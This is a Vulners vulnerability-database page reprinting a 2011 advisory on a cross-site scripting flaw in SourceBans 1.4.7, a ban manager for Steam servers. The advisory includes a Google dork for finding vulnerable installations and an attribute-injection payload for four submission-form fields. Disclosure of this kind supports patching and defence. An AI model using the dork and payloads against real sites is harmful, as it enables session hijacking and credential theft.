Vulners
Lucene search
SourceBans 1.4.7 Cross Site Scripting
`# Exploit Title: SourceBans Version 1.4.7 XSS
# Google Dork: inurl:"sourcebans/index.php?p=submit"
# Date: Feb. 9th 2011
# Author: Sw1tCh
# Software Link: http://www.sourcebans.net/
# Version: 1.4.7
Info:
SourceBans is an application for managing publicly the banned users for a Steam Server.
#-= The Advisory =-
SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.
#-= Example =-
http://<SITE>/sourcebans/index.php?p=submit
- > BanIP => " onmouseover=prompt(928137) bad="
- > Comments => " onmouseover=prompt(928137) bad="
- > Name => " onmouseover=prompt(928137) bad="
- > Email => " onmouseover=prompt(928137) bad="
#Disclosure Information:
- Vulnerability found and researched: January 18th 2011
- Vendor (SourceBans) contacted: January 18th 2011
[ Time Reduced because Ops of IRC channel were dicks ]
- Disclosed to Exploit-DB, Bugtraq and InterN0T:
#Credits: Sw1tCh
#Shoutouts : gen0cide, Scruffy, Griff, D00dl3,
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Feb 2011 00:00Current
7.4High risk
Vulners AI Score7.4